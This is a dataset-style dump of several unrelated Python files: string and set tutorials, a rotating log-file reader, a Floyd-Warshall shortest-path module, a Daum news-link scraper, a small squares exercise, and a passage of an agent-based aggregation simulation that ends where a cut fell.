blob_id stringlengths 40 40 | language stringclasses 1
value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30
values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2
values | text stringlengths 12 5.47M | download_success bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
4bd4c1a663b4d6bfb5284cc9bcae0b774631c1dc | Python | LoliSensei/python_practica | /3-trabajando_strings.py | UTF-8 | 1,494 | 4.875 | 5 | [] | no_license | "|Asi se declaran los caracteres/cadenas|"
# Strings are declared with quotes.
nombres = "Cristian"
# "\n" inserts a line break.
print(nombres + "\n" + "Tomat")
# A backslash escapes special characters, e.g. embedded double quotes.
print("\"Ni que fuera chiquito\"")
# str.lower() returns a lowercase copy of the string.
print(nombres.lower())
# str.upper() returns an uppercase copy of the string.
print(nombres.upper())
# str.islower() -> True when every cased character is lowercase.
print(nombres.islower())
# str.isupper() -> True when every cased character is uppercase.
print(nombres.isupper())
# len() counts the characters in a string.
print(len(nombres))
# Indexing retrieves a single character (0-based).
print(nombres[0])
# str.index() returns the position of the first occurrence of a
# character or substring.
print(nombres.index("r"))
# str.replace() substitutes part of the string with new text.
print(nombres.replace("tian", "topher"))
| true |
ccc9a97f80781141afcbaed18601277cb10d6fa2 | Python | llxmilan/dv | /nstc_etl_tool/utils/rotatingfile.py | UTF-8 | 9,950 | 2.578125 | 3 | [] | no_license | #coding=utf-8
import sys, os
import time, datetime
import re
printf = lambda s:sys.stderr.write('%s\n' % s)
class RotatingFile(object):
    """Present a family of rotating log files as one continuous stream.

    ``pattern`` names the file family; concrete subclasses define how names
    are parsed and what the "next" file is by implementing ``parse_pattern``,
    ``_split_pattern`` and ``compute_rollover``.

    NOTE(review): written for Python 2 (``raise Exc, msg`` syntax); it will
    not parse under Python 3 without porting.
    """
    # Offset-file name template; "perfix" (sic) is the key produced by the
    # subclasses' parse_pattern().
    DEFAULT_OFFSET_FILE = '%(perfix)soffset'
    def __init__(self, pattern):
        self.pattern = pattern                       # raw pattern string
        self._pattern = self.parse_pattern(pattern)  # parsed dict (subclass-defined)
        self._file = None   # path string before open, file object after
    def __enter__(self):
        return self
    def __exit__(self, *exc_info):
        # Close only if the lazy `file` property actually opened something.
        if self._file and not isinstance(self._file, str):
            self._file.close()
    @property
    def file(self):
        # Lazily open the current file the first time it is read.
        if not hasattr(self._file, 'readlines'):
            if self._file is None:
                raise LookupError, "Do seek before read files"
            printf("open file %s" % self._file)
            self._file = open(self._file, 'rb')
        return self._file
    def tell(self):
        # Return (current file name, byte offset).
        return self._file.name, self.offset
    @property
    def offset(self):
        # Byte offset within the current file.
        return self._file.tell()
    def seek(self, filename, offset):
        # Position the stream at `offset` inside `filename`.
        # Complete the path if only a bare file name was given.
        path, basename = os.path.split(filename)
        if not path:
            filename = os.path.join(self._pattern['path'], filename)
        pattern = self._split_pattern(filename)
        if self._check_pattern(pattern):
            self._file = filename
            self.file.seek(offset)
            self._nextfile = None
    def seek_first_match(self):
        # Placeholder; not implemented.
        pass
    @property
    def default_offsetfile(self):
        # Full path of the default offset bookkeeping file.
        return os.path.join(self._pattern['path'], self.DEFAULT_OFFSET_FILE % self._pattern)
    def seek_fromfile(self, offsetfile = None):
        # Restore position from an offset file; True on success.
        offsetfile = offsetfile or self.default_offsetfile
        #printf(offsetfile)
        if not os.path.exists(offsetfile):
            return False
        with open(offsetfile) as f:
            s = f.readline()
        #todo: check s
        # The offset file holds one line: "<filename> <offset>".
        filename, _, offset = s.strip().partition(' ')
        # NOTE(review): isalnum() also accepts letters; isdigit() would be a
        # stricter check for a numeric offset.
        if not offset.isalnum():
            printf('Invalid offset' + repr(s))
            return False
        printf("Seek from file %s (%s %s)" % (offsetfile, filename, int(offset)))
        self.seek(filename, int(offset))
        return True
    def save_offset(self, offsetfile = None):
        # Persist (current file, offset) so a later run can resume.
        offsetfile = offsetfile or self.default_offsetfile
        current = self.file.name
        # Store a relative name when the data file lives next to the offset
        # file, an absolute path otherwise.
        if not is_thesame_path(current, offsetfile):
            current = os.path.abspath(current)
        else:
            current = os.path.basename(current)
        printf("Offset saved into %s (%s %s)" % (offsetfile, current, self.offset))
        # NOTE(review): the handle returned by open() is never closed
        # explicitly; this relies on CPython refcounting.
        open(offsetfile, 'w').write("%s %s" % (current, self.offset))
    def readline(self):
        # Read one line, rolling over to the next file at EOF.
        l = self.file.readline()
        if not l:
            self.rollover()
            l = self.file.readline()
        return l
    def __iter__(self):
        # Iterate over all lines, following rollovers until none remain.
        f = self.file
        while 1:
            l = f.readline()
            if l:
                yield l
            elif self.rollover():
                f = self.file
            else:
                break
    def outputlines(self, lines, output = sys.stdout.write):
        # Emit up to `lines` lines through `output`, following rollovers.
        f = self.file
        linecount = 0
        while linecount < lines:
            l = f.readline()
            if l:
                output(l)
                linecount += 1
            elif self.rollover():
                f = self.file
            else:
                break
    def output(self, output = sys.stdout.write):
        # Emit every remaining line through `output`, following rollovers.
        f = self.file
        while 1:
            l = f.readline()
            if l:
                output(l)
            elif self.rollover():
                f = self.file
            else:
                break
    def rollover(self):
        # Switch to the next file in the sequence; True if it exists.
        if not self._nextfile:
            self._nextfile = os.path.join(self._pattern['path'], self.compute_rollover())
        if os.path.exists(self._nextfile):
            self._file.close()
            # Back to a plain path; reopened lazily by the `file` property.
            self._file = self._nextfile
            self._nextfile = None
            return True
        else:
            printf("Failed in rolling over, exit now")
            return False
    def compute_rollover(self):
        """To be overridden: return the base name of the next file."""
        raise NotImplementedError
    def _check_pattern(self, pattern):
        # Validate that `pattern` belongs to the same family as self._pattern.
        if not pattern:
            return False
        if not is_thesame_path(pattern['path'], self._pattern['path']):
            raise IOError, "'%s' must in the same directory with %s" \
                % (pattern['path'], self._pattern['path'])
        if pattern['perfix'] != self._pattern['perfix']:
            raise TypeError, "'%s' has different perfix with pattern '%s'" \
                % (pattern['perfix'], self._pattern['perfix'])
        return True
class NumericRotatingFile(RotatingFile):
    """Rotating files whose names end in a fixed-width, zero-padded number.

    A pattern such as ``access.000`` matches ``access.000``, ``access.001``,
    ... with the digit count taken from the run of zeros in the pattern.
    """
    PATTERN_FORMAT = r'(.*?)(0+)$'        # perfix + run of zeros
    ROTATING_FORMAT = r'(.*?)(\d{%d})$'   # perfix + fixed-width number
    def __init__(self, pattern):
        super(NumericRotatingFile, self).__init__(pattern)
    def parse_pattern(self, pattern):
        """Split the user pattern into path, perfix and digit count."""
        path, pattern = os.path.split(pattern)
        parts = re.compile(self.PATTERN_FORMAT).findall(pattern)
        if not parts:
            # Call-style raise works on both Python 2 and 3 (the original
            # used the Python-2-only ``raise Exc, msg`` form).
            raise SyntaxError("'%s' is not a correct numeric rotating file pattern" % pattern)
        perfix, zeros = parts[0]
        pattern = {
            'path': path,
            'perfix': perfix,
            'zeros': len(zeros),
        }
        return pattern
    def _split_pattern(self, filename):
        """Split a concrete file name into path, perfix and its number."""
        path, pattern = os.path.split(filename)
        parts = re.compile(self.ROTATING_FORMAT % self._pattern['zeros']).findall(pattern)
        if not parts:
            raise TypeError(filename)
        perfix, num = parts[0]
        pattern = {
            'path': path,
            'perfix': perfix,
            'num': int(num),
        }
        return pattern
    def _check_pattern(self, pattern):
        return super(NumericRotatingFile, self)._check_pattern(pattern)
    def compute_rollover(self):
        """Return the file name that follows the current one in the sequence."""
        pattern = self._split_pattern(self._file.name)
        num = str(pattern['num'] + 1).zfill(self._pattern['zeros'])
        if len(num) > self._pattern['zeros']:
            # Bug fix: the original referenced an undefined name `perfix`
            # here, turning the intended IndexError into a NameError.
            raise IndexError("%s%s is out of pattern %s"
                             % (pattern['perfix'], num, self.pattern))
        return pattern['perfix'] + num
class TimedRotatingFile(RotatingFile):
    """Rotating files whose names embed a strftime timestamp.

    A pattern such as ``app.{%Y-%m-%d}`` means names like ``app.2011-11-11``;
    the next file is the current timestamp advanced by one unit of the
    format's finest resolution (see ``get_resolution``/``dateadd``).
    """
    PATTERN_FORMAT = r'(.*)\{(.*)\}$'   # perfix + {strftime format}
    def __init__(self, pattern):
        super(TimedRotatingFile, self).__init__(pattern)
    def compute_rollover(self):
        """Return the file name one time-resolution step after the current one."""
        pattern = self._split_pattern(self._file.name)
        newtime = dateadd(pattern['time'], **{self._pattern['resolution'] : 1})
        newfile = datetime.datetime.strftime(newtime, self._pattern['format'])
        if newfile == os.path.basename(self._file.name):
            # Bug fix: the original referenced undefined names `perfix` and
            # `num` (copy-pasted from NumericRotatingFile), turning the
            # intended IndexError into a NameError.
            raise IndexError("%s is out of pattern %s" % (newfile, self.pattern))
        return newfile
    def parse_pattern(self, pattern):
        """Split the user pattern into path, perfix, strftime format and resolution."""
        path, pattern = os.path.split(pattern)
        parts = re.compile(self.PATTERN_FORMAT).findall(pattern)
        if not parts:
            # Call-style raise works on both Python 2 and 3; message fixed
            # ("timed", not "numeric" — copy-paste error in the original).
            raise SyntaxError("'%s' is not a correct timed rotating file pattern" % pattern)
        perfix, timeformat = parts[0]
        pattern = {
            'path': path,
            'perfix': perfix,
            'format': perfix + timeformat,
            # dateadd() keyword: 'years', 'months', 'days', ...
            'resolution': get_resolution(timeformat) + 's',
        }
        return pattern
    def _split_pattern(self, filename):
        """Split a concrete file name into path, perfix and its timestamp."""
        path, pattern = os.path.split(filename)
        try:
            dt = datetime.datetime.strptime(pattern, self._pattern['format'])
        except ValueError:
            raise TypeError("%s" % filename)
        # The name must start with the perfix exactly.
        parts = pattern.split(self._pattern['perfix'])
        if len(parts) == 1 or parts[0] != '':
            raise TypeError("%s" % filename)
        pattern = {
            'path': path,
            'perfix': self._pattern['perfix'],
            'time': dt,
        }
        return pattern
    def _check_pattern(self, pattern):
        return super(TimedRotatingFile, self)._check_pattern(pattern)
def is_thesame_path(filea, fileb):
    """Return True when both files resolve to the same parent directory."""
    parents = [os.path.dirname(os.path.abspath(f)) for f in (filea, fileb)]
    return parents[0] == parents[1]
def get_resolution(timeformat):
    """Return the finest time unit a strftime format string preserves.

    Examples:
        get_resolution('%Y-%m-%d %H')  # -> 'hour'
        get_resolution('%Y%m')         # -> 'month'

    Round-trips a probe datetime through strftime/strptime; the finest
    component the format keeps survives with a value > 1.
    Returns None if no component survives.
    """
    dt = datetime.datetime
    # Probe with a fixed instant whose components are all 11.
    # Bug fix: the original used fromtimestamp(1320981071), whose hour
    # depends on the local timezone — in a timezone where the local hour
    # was 0 or 1 the 'hour' resolution was misdetected.
    test_time = dt(2011, 11, 11, 11, 11, 11)
    deg_str = dt.strftime(test_time, timeformat)
    deg_time = dt.strptime(deg_str, timeformat)
    # Check finest-to-coarsest; the first surviving component wins.
    timeunit = ['second', 'minute', 'hour', 'day', 'month', 'year']
    for u in timeunit:
        if getattr(deg_time, u) > 1:
            return u
def dateadd(dt, **kwargs):
    """Date arithmetic with calendar-aware year/month handling.

    Given a datetime object *dt*, accepts ``years`` and ``months`` (handled
    with calendar rollover) plus any keyword understood by
    ``datetime.timedelta`` (``days``, ``hours``, ``minutes``, ``seconds``, ...).

    Example:
        d = datetime.datetime(2011, 10, 9)
        dateadd(d, years = 1, months = 2, days = 20)
        # -> datetime.datetime(2012, 12, 29)  (docstring example fixed)
    """
    month = dt.month + int(kwargs.pop('months', 0))
    # Bug fix: use floor division so this works on Python 3 as well; the
    # original '/' yields a float there, making replace(year=...) raise.
    year = int(kwargs.pop('years', 0)) + month // 12 - (month % 12 == 0)
    # Map month 0 back to 12 (December of the previous year).
    month = month % 12 or 12
    newdate = dt.replace(year = dt.year + year, month = month)
    return newdate + datetime.timedelta(**kwargs)
def Open(**kwargs):
    """Placeholder factory for opening a rotating file; not implemented yet."""
    pass
if __name__ == "__main__":
    # Command-line front end: tail/cat a rotating file family, optionally
    # resuming from (and saving to) an offset file.  Python 2 only
    # (``except Exc, name`` syntax, below).
    import getopt
    optionlist = ['help', 'seek-from-file=', 'start=', 'offset=', 'rotating-pattern=', 'type=', 'no-auto-save']
    try:
        opts, argv = getopt.getopt(sys.argv[1:], "hfn:p:s:o:t:", optionlist)
    except getopt.GetoptError, err:
        printf(err)
        sys.exit(2)
    args = {}
    for o, arg in opts:
        # print 'parsing %s:%s' % (o, arg)
        # NOTE(review): ('-n') is a plain string, not a 1-tuple, so `in`
        # does a substring test here (and for -f / long options below).
        # It happens to match the intended flags, but e.g. "-" would too.
        if o in ('-n'):
            args['lines'] = int(arg)
        elif o in ('-p', '--rotating-pattern'):
            args['pattern'] = arg
        elif o in ('-t', '--type'):
            args['type'] = arg
        elif o in ('-s', '--start'):
            args['start'] = arg
        elif o in ('-o', '--offset'):
            args['offset'] = int(arg)
        elif o in ('-f'):
            args['use_default_offsetfile'] = True
        elif o in ('--seek-from-file'):
            args['offsetfile'] = arg
        elif o in ('--no-auto-save'):
            args['no-auto-save'] = True
        elif o in ('-h', '--help'):
            pass
    # printf(args)
    # printf(argv)
    pattern = args.get('pattern')
    if not pattern:
        printf("Please specify a rotating file pattern")
        exit(1)
    # Map the -t/--type argument to the handler class.
    type_mapping = {
        'num': NumericRotatingFile,
        'numeric': NumericRotatingFile,
        'time': TimedRotatingFile,
    }
    rotating_handler = type_mapping.get(args.get('type'))
    if not rotating_handler:
        printf("Rotating type missing or incorrect.")
        exit(2)
    # f = rotating_handler(pattern)
    with rotating_handler(pattern) as f:
        offsetfile = args.get('offsetfile')
        if args.get('offsetfile') or args.get('use_default_offsetfile'):
            # NOTE(review): `offsetfile` is not passed through here, so an
            # explicit --seek-from-file path is silently ignored in favor
            # of the default offset file.
            f.seek_fromfile()
        else:
            start, offset = args.get('start'), args.get('offset', 0)
            if not start:
                printf("Set start file and it's offset or specify an offset file")
                exit(3)
            f.seek(start, offset)
        # No -n given: stream everything; otherwise emit `lines` lines.
        lines = args.get('lines')
        if lines is None:
            f.output()
        else:
            f.outputlines(lines)
        if not args.get('no-auto-save'):
            f.save_offset(offsetfile)
bb3ba04a2eb8aafd7ba4f4e60ba6867392f20b3b | Python | chloro4m/python_practice_codes | /all_pairs_shortest_path_alternate_implement.py | UTF-8 | 2,989 | 3.671875 | 4 | [] | no_license | # All Pairs Shortest Path Implementation
import sys
# Adjacency-map representation: graph[u][v] = weight of directed edge (u, v).
graph = {0: {1: 2, 4:4},
         1: {2:3},
         2: {3:5, 4:1 },
         3: {0: 8},
         4: {3:3}}
def allPairsShortestPath(g):
    """Floyd-Warshall all-pairs shortest paths.

    `g` is an adjacency map: g[u][v] = weight of edge (u, v).
    Returns (dist, pred), two nested dicts where dist[u][v] is the cost of
    the cheapest u->v path and pred[u][v] the predecessor of v on it.
    """
    vertices = list(g)
    dist = {u: {} for u in vertices}
    pred = {u: {} for u in vertices}
    # Initialization: "infinite" everywhere, zero on the diagonal, and the
    # direct edge weights where an edge exists.
    for u in vertices:
        for v in vertices:
            dist[u][v] = sys.maxsize
            pred[u][v] = None
        dist[u][u] = 0
        for v, w in g[u].items():
            dist[u][v] = w
            pred[u][v] = u
    # Relaxation: allow each vertex in turn to act as an intermediate stop.
    for mid in vertices:
        for u in vertices:
            for v in vertices:
                candidate = dist[u][mid] + dist[mid][v]
                if candidate < dist[u][v]:
                    dist[u][v] = candidate
                    pred[u][v] = pred[mid][v]
    return (dist, pred)
def constructShortestPath(s, t, pred):
    """Rebuild the s->t path from the predecessor table `pred`.

    Returns the vertex list [s, ..., t], or None when t is unreachable.
    """
    hops = [t]
    node = t
    while node != s:
        node = pred[s][node]
        if node is None:
            return None
        hops.append(node)
    hops.reverse()
    return hops
##That is, graph is a dictionary whose keys are the vertices and the value is itself
##a dictionary of vertex : weight pairs. Thus in the above representation, there
##are two edges emanating from vertex 0: (0,1) and (0,4). Edge (0,1) has a weight
##of 2 while edge (0,4) has a weight of 4.
##
##With such a graph, invoke allPairsShortestPath and be prepared to receive a
##dist and pred matrix containing the solution
##
## >>> dist, pred = allPairsShortestPath(graph)
##
##The dist structure is a two-dimensional dictionary whose value dist[i][j] represents
##the minimum cost of any path between vertices i and j. pred[i][j] represents the
##previous vertex to use when traversing the shortest path from vertex i to j. To
##recover the solutions, invoke following:
##
## >>> constructShortestPath(s, t, pred)
##
##where s and t are vertices in the graph and pred is the structure returned by
##allPairseShortestPath
# A small memoized recursion, as a dynamic-programming example.
past_fib = {}
def fibonacci(n):
    """Return the nth Fibonacci number (fib(0) == fib(1) == 1), memoized."""
    cached = past_fib.get(n)
    if cached is not None:
        return cached
    if n in (0, 1):
        result = 1
    else:
        result = fibonacci(n - 1) + fibonacci(n - 2)
    past_fib[n] = result
    return result
| true |
eb54855cdfe1ae53efee4203a7703ba9c78015fc | Python | jxie0755/Learning_Python | /StandardLibrary/learn_set_operation.py | UTF-8 | 7,702 | 4.15625 | 4 | [] | no_license | """
set operation
https://docs.python.org/3/library/stdtypes.html#set-types-set-frozenset
"""
print("class set([iterable]))")
print("class frozenset([iterable])")
# There are two set types: the mutable `set` and the immutable `frozenset`.
# A set is an unordered collection of distinct hashable objects.
# It resembles a tuple or list, but is unordered and rejects duplicates;
# typical uses are membership testing, de-duplication, and math operations
# (union, intersection, difference, symmetric difference).
# Sets therefore support `x in s`, `len(s)` and `for x in s`.
# Being unordered, a set records neither element position nor insertion
# order, so it supports no indexing, slicing, or other sequence behaviour.
# `set` is mutable — add()/remove() change its contents — hence unhashable:
# it cannot be a dict key or an element of another set.
# `frozenset` is immutable and hashable: its contents are fixed at creation,
# so it can serve as a dict key or as an element of another set.
# create a set
# use set() to create from a list or a tuple
lst = [1,2,5,3,3,3,4,5]
tup = (1,3,3,5,7,7,9)
tup2 = ("a", "s", "d", "f")
print(set(lst)) # >>> {1, 2, 3, 4, 5}
print(set(tup)) # >>> {1, 3, 5, 7, 9} # numbers may display sorted, but there is still no ordering
print(set(tup2)) # >>> e.g. {"s", "d", "a", "f"} # strings display in arbitrary order (no sequence)
# from dict, create a set of keys or values.
dic = {"a": 1, "b": 3, "c": 3, "d": 2}
print(set(dic)) # >>> {"a", "b", "c", "d"}  (original comment wrongly omitted "d")
print(set(dic.values())) # >>> {1, 2, 3}
# create from using {} directly for NON-EMPTY set
set1 = {4,5,6}; print(set1) # >>> {4, 5, 6}
set2 = {4,5,5,6}; print(set2) # >>> {4, 5, 6} # duplicates are still filtered
# create empty set ({} would be an empty dict)
emptset = set([])
print(emptset) # >>> set()
# create frozenset
# frozenset is a frozen set: immutable and hashable, so it can be used as a
# dict key or as an element of another set.
# Construction is the same as set(), but {} literals cannot build one.
print(frozenset(lst)) # >>> frozenset({1, 2, 3, 4, 5})
print(frozenset(tup)) # >>> frozenset({1, 3, 5, 7, 9})
print(frozenset(tup2)) # >>> frozenset({"s", "d", "a", "f"})
# there is no point to create empty frozenset, but you still can
emptfset = frozenset([])
print(emptfset) # >>> frozenset()
# Immutable once created: there are no add()/remove() methods.
a = [0, 1, 1, 1, 2, 3, 3, 4]
fst = frozenset(a)
# fst.add(9) AttributeError: "frozenset" object has no attribute "add"
# fst.remove(4) AttributeError: "frozenset" object has no attribute "remove"
# A frozenset can be used as a dictionary key (the whole set is the key).
adict = {fst:1, "b":2} # works
# bdict = {st:1, "b":2} # TypeError: unhashable type: "set"
# basic attributes and operation
a = [0, 1, 1, 1, 2, 3, 3, 4, "foo", "bar"]
st = set(a) # >>> {0, 1, 2, 3, 4, "foo", "bar"}
fst = frozenset(a) # >>> frozenset({0, 1, 2, 3, 4, "foo", "bar"})
print(len(st)) # >>> 7
print(2 in st, "bar" not in st) # >>> True False
st1 = {1,2,3}
st2 = {1, 2, "c"}
print(st1.isdisjoint(st2)) # >>> False
print(emptset.isdisjoint(emptfset)) # >>> True # for two empty set
# isdisjoint(other) returns True when no element of this set appears in
# `other` (the two sets do not intersect).
# Two sets are disjoint if and only if their intersection is empty.
# create a copy
st1 = {1,2,3}
st2 = st1.copy()
print(st2) # >>> {1, 2, 3}
# subset
st1 = {1,2,3}
st2 = {4,1,5,2,6,3}
st3 = {3,2,1}
print(st1.issubset(st2)) # >>> True
print(st1.issubset(st3)) # >>> True # even when the two sets are identical
print(st1 <= st3) # >>> True # same function
print(st1 < st3) # >>> False # tests for a PROPER subset
# superset
print(st2.issuperset(st1)) # >>> True
print(st2 >= st1) # >>> True
print(st3 > st1) # >>> False # tests for a PROPER superset
# Set algebra (union / intersection / difference)
st1 = {1,2,3,4}
st2 = {3,4,5,6}
st3 = {4,5,6,7}
# union(other, ...)
# set | other | ...
# union: all elements in any of the sets
print(st1.union(st2, st3)) # >>> {1, 2, 3, 4, 5, 6, 7}
print(st1 | st2 | st3) # >>> {1, 2, 3, 4, 5, 6, 7}
# intersection(other, ...)
# set & other & ...
# intersection: elements common to every set
print(st1.intersection(st2, st3)) # >>> {4}
print(st1 & st2 & st3) # >>> {4}
# difference(*others)
# set - other - ...
# difference: elements of the first set missing from the others
print(st1.difference(st2, st3)) # >>> {1, 2} # items in st1 but not in st2 and st3
print(st1 - st2 - st3) # >>> {1, 2} # same
print({1,2,3} - {1,2,3,4}) # >>> set() # subset minus superset is empty
# symmetric_difference(other)
# set ^ other
# symmetric difference: a new set with the elements that appear in exactly
# one of the two sets, never in both.
print(st1.symmetric_difference(st2)) # >>> {1, 2, 5, 6}
print(st1 ^ st2) # >>> {1, 2, 5, 6}
# other comparisons:
# frozenset compares with set instances element by element.
st = set([1,2,3]) # >>> {1, 2, 3}
fst = frozenset([1,2,3,4,5]) # >>> frozenset({1, 2, 3, 4, 5})
print(st == fst) # >>> False
print(st >= fst) # >>> False
print(st <= fst) # >>> True
# Binary ops mixing set and frozenset return the type of the FIRST operand.
print(st | fst) # >>> {1, 2, 3, 4, 5}
print(fst | st) # >>> frozenset({1, 2, 3, 4, 5})
print(st.symmetric_difference(fst)) # >>> {4, 5}
print(fst.symmetric_difference(st)) # >>> frozenset({4, 5})
# The operations below exist on the mutable `set` but not on `frozenset`.
# update(other, ...)
# set |= other | ...
# Update the set in place, adding the elements of every `other`.
st1 = {1,2,3,4}
st2 = {"a", "b", "c", "d"}
st1.update([9], [10]) # must be iterable; bare numbers cannot be passed
print(st1) # >>> {1, 2, 3, 4, 9, 10}
st2.update("x y z", "lol")
print(st2) # >>> {"c", "l", "a", "b", "d", "x", " ", "z", "y", "o"} # note: each CHARACTER is added, not the whole strings "x y z"/"lol"
st1 |= {10, 11, 13} # one at a time
print(st1) # >>> {1, 2, 3, 4, 9, 10, 11, 13}
# intersection_update(other, ...)
# set &= other & ...
# Update the set in place, keeping only elements shared with the others.
st1 = {1,2,3,4}
st2 = {3,4,5,6}
st1.intersection_update(st2)
print(st1) # >>> {3, 4} # mutates st1 rather than building a new set
# difference_update(other, ...)
# set -= other | ...
# Update the set in place, removing the elements found in the others.
st1 = {1,2,3,4}
st2 = {3,4,5,6}
st1.difference_update(st2)
print(st1) # >>> {1, 2}
# symmetric_difference_update(other)
# set ^= other
# Update the set in place, keeping elements found in exactly one of the two.
st1 = {1,2,3,4}
st2 = {3,4,5,6}
st1.symmetric_difference_update(st2)
print(st1) # >>> {1, 2, 5, 6}
# add(elem)
# Add element elem to the set.
st1 = {1,2,3,4}
st1.add(9)
print(st1) # >>> {1, 2, 3, 4, 9}
# remove(elem)
# Remove elem from the set; raises KeyError if elem is not a member.
st1 = {1,2,3,4}
st1.remove(3)
print(st1) # >>> {1, 2, 4}
# st1.remove(8) # raises KeyError
# discard(elem)
# Remove elem from the set if it is present (no error otherwise).
st1 = {1,2,3,4}
st1.discard(8) # no KeyError raised
st1.discard(1)
print(st1) # >>> {2, 3, 4}
# pop()
# Remove and return an arbitrary element; raises KeyError on an empty set.
st1 = {4,2,1,3}
st2 = {"a", "b", "c", "d"}
st1.pop() # pop() takes no index argument
st1.pop()
print(st1) # >>> {3, 4} # small ints often pop lowest-first, but this is an implementation detail
# The reason it says it is arbitrary is because there is no guarantee about the ordering it will pop out.
# STOF: https://stackoverflow.com/q/9848693/8435726
st2.pop()
print(st2) # >>> e.g. {"a", "c", "d"} # with strings the choice is even less predictable
# clear()
# Remove all elements from the set.
st1 = {4,2,1,3}
st1.clear()
print(st1) # >>> set()
| true |
a1156b74ce40094ed4c6ddc3d6157e284b8bc18a | Python | ponymoon/python-sect2 | /과제3.py | UTF-8 | 652 | 2.640625 | 3 | [] | no_license | from bs4 import BeautifulSoup
import urllib.request as req
import sys
import io
# Re-wrap stdout/stderr as UTF-8 so Hangul output prints correctly.
sys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding = 'utf-8')
sys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding = 'utf-8')
url = "https://www.daum.net"
# Fetch the page and decode it with the charset declared in the response
# headers.  NOTE(review): the URL is fetched twice (once for the body, once
# for the headers); a single urlopen() result could serve both.
res = req.urlopen(url).read().decode(req.urlopen(url).headers.get_content_charset()) # the page uses euc-kr, so passing 'euc-kr' directly would also work
soup = BeautifulSoup(res,"html.parser")
# Anchors with tabindex="-1" — presumably the trending search terms; verify
# against the live markup, which changes over time.
list_10 = soup.find_all("a", tabindex="-1")
# Print rank (1-based), search term, and link for each entry.
for i,k in enumerate(list_10,1):
    print(i,'.','검색어 :', k.string,'link주소 :', k.attrs['href'])
# CSS selectors observed on the page:
#ol.list_hotissue issue_row list_mini
#span.txt_issue
#for k in list_10:
78ba51c2f1cc15327af69883584bede8f4c36e95 | Python | catacristea/ThinkPython | /100 - Problems/Day10/6.py | UTF-8 | 351 | 4.125 | 4 | [] | no_license | '''
Question 36
Question:
Define a function which can generate a list where the values are square of numbers between 1 and 20 (both included).
Then the function needs to print all values except the first 5 elements in the list.
'''
def list_generator():
    """Print (and return) the squares of 1..20, skipping the first five.

    Improvement over the original: the computed sublist is now also
    returned (the original printed it and returned None), which is
    backward-compatible and lets callers use the value programmatically.
    """
    squares = [i ** 2 for i in range(1, 21)]
    tail = squares[5:]
    print(tail)
    return tail
list_generator()
184f326d608b112cb06ef915ecb35aa23edfc749 | Python | andresgr96/Agent-Based-Covid-Simulation | /experiments/aggregation/aggregation.py | UTF-8 | 5,528 | 2.5625 | 3 | [] | no_license |
from experiments.aggregation.cockroach import Cockroach
from experiments.aggregation.config import config
from simulation.utils import *
from simulation.swarm import Swarm
import numpy as np
import pygame
from typing import Tuple
from simulation.agent import Agent
from simulation.utils import normalize, truncate
# Which scenario to build: "stage1", "stage2.0", "stage2.1", "stage3" or "stage3.1".
experiment = "stage3"
class Aggregations(Swarm):
    """Swarm environment for the aggregation experiments.

    Builds one of several arenas (an obstacle ring plus one or more
    aggregation "site" circles chosen by the module-level `experiment`
    flag) and populates it with Cockroach agents placed inside the arena.
    """
    def init(self, screen_size) -> None:
        # NOTE(review): this is named `init`, not `__init__`, and
        # `super(Swarm, self)` starts the MRO lookup AFTER Swarm (i.e. at
        # Swarm's parent) — confirm both are intentional.
        super(Swarm, self).init(screen_size)
    def initialize(self, num_agents: int) -> None:
        """
        Initialize the whole swarm, creating and adding the obstacle objects, and the agent, placing them inside of the
        screen and avoiding the obstacles.
        :param num_agents: int:
        """
        # Center of the arena obstacle, from the experiment config.
        object_loc_main = config["base"]["object_location"]
        if experiment == "stage2.0":
            # Arena + two equal sites.
            self.objects.add_object(file = "experiments/flocking/images/redd.png", pos = object_loc_main, scale = [800, 800], obj_type = "obstacle")
            object_loc = config["first_circle"]["object_location"]
            self.objects.add_object(
                file="experiments/aggregation/images/greyc1.png", pos=object_loc, scale=[200, 200], obj_type="site"
            )
            object_loc = config["second_circle"]["object_location"]
            self.objects.add_object(
                file="experiments/aggregation/images/greyc1.png", pos=object_loc, scale=[200, 200], obj_type="site"
            )
        elif experiment == "stage1":
            # Arena + a single central site.
            self.objects.add_object(file="experiments/flocking/images/redd.png", pos=object_loc_main, scale=[800, 800],
                                    obj_type="obstacle")
            object_loc = config["center_circle"]["object_location"]
            self.objects.add_object(
                file="experiments/aggregation/images/greyc1.png", pos=object_loc, scale=[200, 200], obj_type="site"
            )
        elif experiment == "stage2.1":
            # Arena + two sites of different sizes (200 vs 225).
            self.objects.add_object(file="experiments/flocking/images/redd.png", pos=object_loc_main, scale=[800, 800],
                                    obj_type="obstacle")
            object_loc = config["first_circle"]["object_location"]
            self.objects.add_object(
                file="experiments/aggregation/images/greyc1.png", pos=object_loc, scale=[200, 200], obj_type="site"
            )
            object_loc = config["second_circle"]["object_location"]
            self.objects.add_object(
                file="experiments/aggregation/images/greyc2.png", pos=object_loc, scale=[225, 225], obj_type="site"
            )
        elif experiment == "stage3":
            # Larger arena (1000) + four equal sites.
            self.objects.add_object(file="experiments/flocking/images/redd.png", pos=object_loc_main, scale=[1000, 1000],
                                    obj_type="obstacle")
            object_loc = config["first_circle"]["object_location"]
            self.objects.add_object(
                file="experiments/aggregation/images/greyc1.png", pos=object_loc, scale=[200, 200], obj_type="site"
            )
            object_loc = config["second_circle"]["object_location"]
            self.objects.add_object(
                file="experiments/aggregation/images/greyc1.png", pos=object_loc, scale=[200, 200], obj_type="site"
            )
            object_loc = config["upper_circle"]["object_location"]
            self.objects.add_object(
                file="experiments/aggregation/images/greyc1.png", pos=object_loc, scale=[200, 200], obj_type="site"
            )
            object_loc = config["lower_circle"]["object_location"]
            self.objects.add_object(
                file="experiments/aggregation/images/greyc1.png", pos=object_loc, scale=[200, 200], obj_type="site"
            )
        elif experiment == "stage3.1":
            # Arena + four sites, two small (200) and two large (225).
            self.objects.add_object(file="experiments/flocking/images/redd.png", pos=object_loc_main, scale=[800, 800],
                                    obj_type="obstacle")
            object_loc = config["first_circle"]["object_location"]
            self.objects.add_object(
                file="experiments/aggregation/images/greyc1.png", pos=object_loc, scale=[200, 200], obj_type="site"
            )
            object_loc = config["second_circle"]["object_location"]
            self.objects.add_object(
                file="experiments/aggregation/images/greyc1.png", pos=object_loc, scale=[200, 200], obj_type="site"
            )
